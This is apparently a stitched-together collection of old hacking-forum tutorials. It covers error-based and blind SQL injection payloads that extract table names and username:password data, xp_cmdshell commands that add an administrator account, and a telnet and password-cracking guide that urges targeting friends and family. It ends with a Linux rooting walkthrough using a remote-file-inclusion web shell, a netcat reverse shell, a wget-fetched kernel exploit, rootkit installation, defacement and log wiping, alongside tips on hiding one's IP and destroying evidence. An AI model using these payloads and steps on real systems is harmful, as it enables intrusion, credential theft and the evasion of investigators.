Get first table:

select top 1 table_name from information_schema.tables order by table_name

Example:

http://site.com/ProductList.cfm?CatDisplay=371%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables %20order%20by%20table_name))--sp_password

Get second table:

select top 1 table_name from information_schema.tables where table_name not in (select top n table_name from information_schema.tables order by table_name) order by table_name

Demo:
Table 2:

http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables order by table_name) order by table_name))--sp_password


Table3:

http://site.com/ProductList.cfm?CatDisplay=371 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 2 table_name from information_schema.tables order by table_name) order by table_name))--sp_password


Retrieved column in the table called ten_table:
(only what is need to transfer ASCII)

select top 1 column_name from information_schema.columns where table_name=ten_table order by column_name

Get 1 Column :

select top 1 column_name from information_schema.columns where table_name=ten_table and column_name not in(select top n column_name from information_schema.columns where table_name=ten_table order by column_name) order by column_name

Once you have stripped and table column in the table important, you get information as usual using the following:

Retrieved final order:

SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32))) char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId
ORDER BY T[1].orderId desc

Get the first order:

SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32)))


Quote:

char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId and T[1].orderId=n

With the first table T i, C [i, j] is the j th column of the table first, orderId column is numbered order order of each table
First We need to install Bitvise Tunnelier software (required)
And and SSH host Account (or SSH File Save)
- You can download the Tunnelier for FREE at www.bitvise.com
- Then install it on your PC
Download Link:
http://dl.bitvise.com/Tunnelier-Inst.exe
Mirror:
http://dl.bitvise.com.s3-external-3.amazonaws.com/Tunnelier-Inst.exe

- Here I show how to use SSH Sock with a SSH File Save
- That is SSH File Save, open it. With SSH File Save you no need to do anything than run it by click Login
- before using just check what port of the SSH File Save
Click Services and see what port ^^... here is 7210
- OK now run the SSH File Save by click Login
- OK and it said succeeded. (we successfully connected with SSH host account)

Now change your Browser Setting to use with SSH to fake your IP
(we can Minimize the SSH File Save).
- In browser, at SOCKS HOST (Sock IP) must always use:
127.0.0.1
- And the Port is the SSH Port. Sock type is SOCK5
- Then check our IP after faking at http://ip-address.domaintools.com
- And we have done ^^

Remember keep the SSH File Save run and how to know the SSH run or NOT? It's very simple, just look the small icon of the SSH Sock at the Taskbar ...
When you need to remove faking SSH Sock, just simply do as me ... And we have done
This method of SQL injection in Microsoft SQL involves injecting a query that attempts converting an sql query to an interger value using convert() though fails, resulting in an error message including the result of the SQL query. This allows an attacker to execute SQL queries on a server.

To test whether a variable is vulnerable to this type of injection, insert a ' onto the end of the value of a variable that acts with the db server, for example: index.asp?id=100' if the site is vulnerable to to this type of attack the page should produce an error msg that looks similiar to this:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string

This allows you to execute sql queries to do tasks such as map out the tables and collumns in the database allowing them to get their hands on all information inside the DB.

convert(int, (select top 1 name from sysobjects where xtype='U' and name>'tablename'))
replacing tablename each time with the table name you get. Say for example from running that query you got a result of the table 'news' you'd run convert(int, (select top 1 name from sysobjects where xtype='U' and name>'news')) this would give you the next table in the database, and so on.

Then it's possible to get the collumns inside a table by using:

convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

obviously replacing TABLE with the table of your choice and colid=1 then colid=2 etc. until all collumns have been found. Of course then with basic SQL knowlege you can extend on this alot.

If the user running the SQL server is 'dbo' (database owner) this opens up alot more possibilities including blind command exection using EXEC. To test whether a server is running under DBO you'd run:

page.asp?vuln=convert(int,user)

while it's DBO you can use this privilege to execute commands on the server allowing you to do things such as start or stop services, add a user account to the system and even escalate privileges to administrator as the db server is running as sysadmin.

page.asp?vuln=1;exec master..xp_cmdshell 'net users username password /add';--
page.asp?vuln=1;exec master..xp_cmdshell 'net localgroup Administrators username /add';--

after this, it's pretty useful to check if remote desktop, telnet are running etc.

If not you could start it yourself

This shows how clearly stupid it would be to run your db under 'dbo'.

A few things you can do to prevent this type of SQL attack are filtering out characters such as quote marks - single and double, the semi colon and even slash and backslash and just generally tightening user input.
In the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.

Inside Hacking The Cable Modem, you'll learn:
# the history of cable modem hacking
# how a cable modem works
# the importance of firmware (including multiple ways to install new firmware)
# how to unblock network ports and unlock hidden features
# how to hack and modify your cable modem
# what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.




Download now
1. Introduction
2. Warnings
3. Copyright Information
4. Disclaimer
5. Who Am I?
6. Shout Outs

Chapter Two: Before We Start

1. What The Hell Is Telnet?
2. What Was The Original Purpose?
3. What Can I Do With It?
4. Is It Illegal?
5. Will I Go To Jail?
6. Is It Fun?


Chapter Three: Getting Started

1. Possible Targets
2. Is The Target Alive?
3. Scanning For Ports
4. Getting An IP
4.A. Messenger
4.B. Social Engineering It
4.C. Your Firewall

Chapter Four: Connecting

1. Connecting To An IP


Chapter Five: What To Do After Your Connected

1. Doing Something!
2. FTP

Chapter Six: Cracking A Pass

1. Brutus
2. Password Lists
3. Default Passwords


Chapter Seven: FAQ's

1. 'I Get A Blank Screen After Connecting!'
2. 'It Says It Can't Connect! WTF!'
3. 'My Computer Flips Off After Connecting!'
4. 'Where Do I Type My Commands?'
5. 'I Got Arrested!!! Can I Sue You?'


Chapter Eight: Wrapping Up

1. Contact Me
2. TGS



~`CHAPTER ONE: INTRODUCTION`~


~`Introduction`~

Hey. I decided that my old telnet tutorial was not sufficient, so I
decided to redo it, among all the other work I have to do. This will
provide a step by step method to: Connect to an IP, Connect to a
certain port, Decide if the port is responsive, Find commands that you
can use on this 'Box', Use the commands, Crack a password using
'Brutus', Find Targets, and many other things. It will also include
many pictures that you can use as a reference. Remember, all command
prompts are different, don't be discouraged.


~`Warnings`~

This is a form of hacking. Whether you do or do not damage a computer,
you are committing a felony. Connecting to a computer or something of
the kind without permission is punishable by law and will get you corn
holed in a state prison by a 365 pound, one eared black man by the
name of bubba. You can be held to Criminal, as well as Civil suites
for your actions.

Doing this is a good way to get enemies' also. Remember, there are
hundreds of hacking groups out there, and hundreds of hackers, there's
a chance that you can be fucking with a hacker of a group, and that is
not a fun thing to do.



~`Copyright Information`~

This or any portion of this paper is allowed to be duplicated. You may
host it on your site, as long as it stays intact. Failure to comply
with this will result in swift legal action.



~`Disclaimer`~

I cannot be held responsible for your actions because of this. I will
not take responsibility. If you don't agree with this, DO NOT READ
FURTHER. I do not condone hacking, as well as any other form of
illegal behavior. Also, you will encounter a number of IP's in this
forum, DO NOT USE ANY OF THEM. The ones I used for demonstration I did
not hurt, and I take no responsibility if you do use them. You have
been warned.

NOTE: I used www.sjms.org (the website of a fine military academy) in
some of my examples. I mean no harm to come to www.sjms.org. I did not
hack www.sjms.org, and I don't recommend you doing it either. I take
no responsibility if you do though.



~`Who Am I?`~

I am Errorised of the www.waushare.com forums. If you'd like to get a hold of me, do
so at koft@habbocommunity.co.uk



~`Shout Outs`~

Hey I'd like to say hello to my good buddies: Wau / Placi / Maki / Unstable /
Phantom / BOOSTER / Chaos Zero / T1M3 / M4K3 / RedFox / Mr.Wolves / h3r3t1c
and whoever else I forgot (due to the pot) These are all buddies, as
well as PSP-Hacks members.



~`CHAPTER TWO: BEFORE WE START`~


~`What Was The Original Purpose Of Telnet?`~

Telnet was originally made for someone to do all sorts of things. From
checking your mail to connecting to your company's server while on a
business trip, telnet does it all. The makers of

it had a dream in mind that the average person could deal with
command/text based programs. But of course when the masses got into it
and every brother and sister bought a computer,

Windows was made, which totally destroyed most text based programs.
Now fucking idiots run computers and company's with computers, and
can't even deal with a damn telnet program!


~`What Can I Do With It?`~

Although Telnet has died for the business men, it is still growing
quickly with the not-so-trustful person. For the hacker, Telnet is the
hammer in the tool box. Telnet is one of the most

world wide programs among hackers, as well as other fun loving people.
When you finally hit that golden hack after your first long hours of
struggling with telnet (not!), you are god!

You can change other people's passwords, snoop on e-mails, forge dirty
e-mails to ones lover,


~`Is It Illegal?`~

Two words: HELL YES. Hacking is the most illegal thing one can do on
the internet. Do not be mistaken, it's quite illegal.



~`Will I Go To Jail?`~

Only if you're caught. This is why it's good to encrypt your entire
hard rive, if they can't get anywhere in your hard rive, how the hell
are they going to charge you with anything? It is very good to be
paranoid. My computer is a vault. The military runs 1800 bit
encryption tops. The average bit encryption for any given file in my
computer is around 7000, Triple Blowfish encrypted. There's also a
shredder that hides in the startup registry that I made in a batch
file, it hides there and if you don't turn it off within 15 seconds of
starting up, bye bye computer and bye bye evidence. It's always good
to be paranoid.


~`Is It Fun?`~

Despite my comments about jail, it is quite fun. Most hackers do what
they do for the simple thrill of knowing secrets that no ones supposed
to know. Having inside information on people

who they barely know or care about. Knowing top secret information
that only god and the president are supposed to know, now that's fun!



~`CHAPTER THREE: GETTING STARTED`~


~`Possible Targets`~

A target is a person, place, or thing (kind of like a noun, eh?) in
which you are planning on attacking. A target can be anyone! Common
targets include: Family, Friends, Government, Phone

Company's, and Former Attackers. Normally the first target is a friend
or family member, someone who's not so smart and someone you know for
a fact has no security. Security just gets in the way. '7337' hackers
learn to deal with security, newbie's fall into the trap. So for now
stick with someone easy.


~`Is The Target Alive?`~

Go to command prompt (or Ms-DOS) and type ping 0.0.0.0. (replacing the
zeros for the real IP). If it returns, then the computer is connected
to the internet. If it says that its lost, then the computer offline
(duh!).



~`Scanning For Ports`~

We will be using Blues Port Scanner to scan for ports. You can get
blues port scanner at download.com or www.library.2ya.com. It is about
400 KB, not too big.
You scan an IP for ports by pasting (CTRL V) the IP in both boxes in
the top. This makes it scan only that ip. You then put the selected
range of ports in which you wish to scan.

The more you scan, the more of a chance they will notice your
movements, but do as you please.





~`Getting An IP`~

IP is short for Internet Protocol. Each computer has an IP. Getting
someones IP can be as easy as asking for it. Here's a few ways:

Messenger:

Ok, so you have MSN messenger. Your a 'bad mofo', a 'rough rider', now
its time to get what you need from your victim. The first thing to do
is build trust. It would be wise to do this on someone you know will
trust you enough to buy into your shit. Here's how you get their IP:

1. Send them a file through MSN (or whatever they have). It can be
anything, a game, a dead hamster, a naked picture of yourself,
whatever.

2. Once they accept, go into Command Prompt and type "netstat".

3. With a bit of hunting and picking you should be able to find their
IP in the box.




Social Engineering:

Social Engineering is a fancy term that people use to discribe smooth
talkers. Social Engineerers are slick, smooth, smart, and know what
their talking about. They get into the part before

attacking, they have great social skills and are easy people to trust.
Social Engineerers build up a nice level of trust, the more the
better, until they get the information they want.
Once, on a SC 'field trip' with a friend of mine, we actually got
dressed up to walk to a payphone and make the attack that we've been
building trust for months. It was worth it.

But anyway, back to the subject.

Usually, all you need to do is ask the person. If they know better
then to give you the IP if you flat out ask them, then they will know
better then if you try to scare it out of them. Get em to go to
ipchicken.com and give you the numbers in the blue letters.


Your Firewall:

If you have a firewall, then chances are you've seen someone trying to
scan you for open ports. If you use Black ICE, all the better. I
suggest you download it at www.library.2ya.com.

What Black ICE does is gather up all the attempts to port probe you,
connect to your computer, or anything else, and stick it in a database
for further use. You can easily pick out targets from the list and use
them for your will.

Double click on the person you wish to get the ip with, and on the
right it gives you the IP AND the DNS! How nice eh?


~`CHAPTER FOUR: CONNECTING`~


~`Connecting To An IP`~


Ok, so you've got your list of open ports on the computer. For this
demonstration I'll be using someone who attempted to hack me a while
back. After scanning a few thousand ports, we come up with this list.
Now not all of these allow connections. The ones labeled with a red
box next to them are 'dead' ports for the telnet program. This is
usually because they only communicate using a certain 'language' that
Telnet doesn't support. When you try to connect to these you get a
blank screen with dashs where you try to type (see below). The
listings labeled with a green next to them allow connections and will
talk to you without having to give it a user or pass. The ones labeled
with a blue box next to them means that they are responsive, are not
dead, but they require authentication before your allowed to connect.
If you really need into this computer and they've got password
protected ports, there's a section later in the paper that tells you
how to get in. So anyway, lets focus on the responsive port. This is
unfortunately the SMTP port (Simple Mail Transfer Protocol). Although
it does not allow a significate amount of access to this persons
computer without knowing advanced things, it does give us a good basis
for a demonstration in Telneting. Below will show you step by step on
how to connect and other things with this port.




1. Connect to the computer by typing "Telnet 0.0.0.0 25" in Command
Prompt/Ms DOS. You should replace the "0.0.0.0" for the IP address you
wish to connect to, and the 25 for the specific port you plan on
connecting to. For this demonstration, I will be using the IP
161.58.163.4 and the port 25. So the command should read "telnet
161.58.163.4 25". There's no special place to type (as I've received
many e-mails questioning this), when you type, it should show up at
the bottom.



2. Press enter.




Congratulations! You just made your first connection! Although it's
not a quantum leap in the exploration of computer security, it's a
start.


~`Doing Something After You Connect


~`CHAPTER FIVE: WHAT TO DO AFTER YOUR CONNECTED`~

~`Doing Something!`~


Alright, so you've got your open connection on an open port. It's best
to keep the connection time down to a minimum to reduce them knowing.
I'll now demonstrate on what to do after you're connected.


1. Generically speaking, typing help will give you a list of all the
commands supported for that Box. However, some require you to log on
before doing so, what a drag!
Alright, after typing help this is how it responded.



You see that there's a nice listing of commands you can use. Since
this port is not pass protected, you have no worries about
restrictions. Typing "help" and then the command in which you want
help on will make it elaborate, which is a great feature for a newbie!
This is a pic of me asking it to elaborate on a few things.




2. You can never forget to say "hello". It's quite rude to run through
someone's home (computer) without even introducing yourself. This
young lady was much nicer after I said "helo" to it.


[NOTE: I lost the pics and I'm too fucking lazy to make a helo pic…
I'm sure you're smart enough to figure it out]


3. Use the commands in the box to figure out what you want to do.
Since every computer and port is different, it is impossible for me to
show you every single thing you can do. Learn to get off your bum and
ask it what some of the commands mean, its a good learning tool.


~`FTP`~

You can also connect to port 21 (FTP, or File Transfer Protocol) using
telnet. Typing help will give you a listing that you nee




~`CHAPTER SIX: CRACKING A PASSWORD`~

~`Brutus`~

Brutus is a great Brute Force password cracker. It is easy to use for
the newbie, fast, and reliable. You can find it by doing a search at
www.google.com for "Brutus".


~`Password Lists`~

I'm proud to announce that two of our TGS members, The_IRS and
Computer Geek, have combined many lists and have came out with a
password list with a total of 2.1 passwords. You can download it here:
http://www.aftdesign.com/hacking/passwords.html


~`Default Passwords`~

You can find many lists of default passwords for any operating systems
on the web. Doing a search at google.com for "Default Password Lists"
will come in handy. Here is a very good site with many default
passwords that you can access in the meantime:
http://www.phenoelit.de/dpl/dpl.html



~`CHAPTER SEVEN: FAQ`~

1. "I Get A Blank Screen After Connecting!"

The port that your connecting to is 'dead', or unusable. This could be
due to a number of different things. For instance, lets say that your
trying to connect to someones computer through telnet, on the kazza
port (which I beleive is 1214). This port is not designed to take
packets (data) from the telnet program, and is specifically designed
to give and receive packets (data) from the kazza program. This could
be one of your problems. Trying to connect to a backdoor for a Sub7
program will also do the same.


2. "It Says I Can't Connect! WTF!"

This is because the port is either closed, or the computer is firewall
protected. As a newbie I wouldn't suggest messing with it.



3. "My Computer Flips Off After Connecting!"

I'll bet money your using Windows. You are aren't ya? I knew it! This
is a Windows Dump File. Either update Windows, get Linux, or forget
hacking.



4. "Where Can I Type My Commands?"

Type a few letters to see where they commands will show up. Most
likely it will be at the bottom of the Command Prompt/MS DOS screen.



5. "I Got Arrested!!! Can I Sue You?"

NO! You read my disclaimer at the top. I don't care who you are, I'm
not taking responsibility.



RoMeO....
Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:

RoMeO.......


You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

RoMeO
top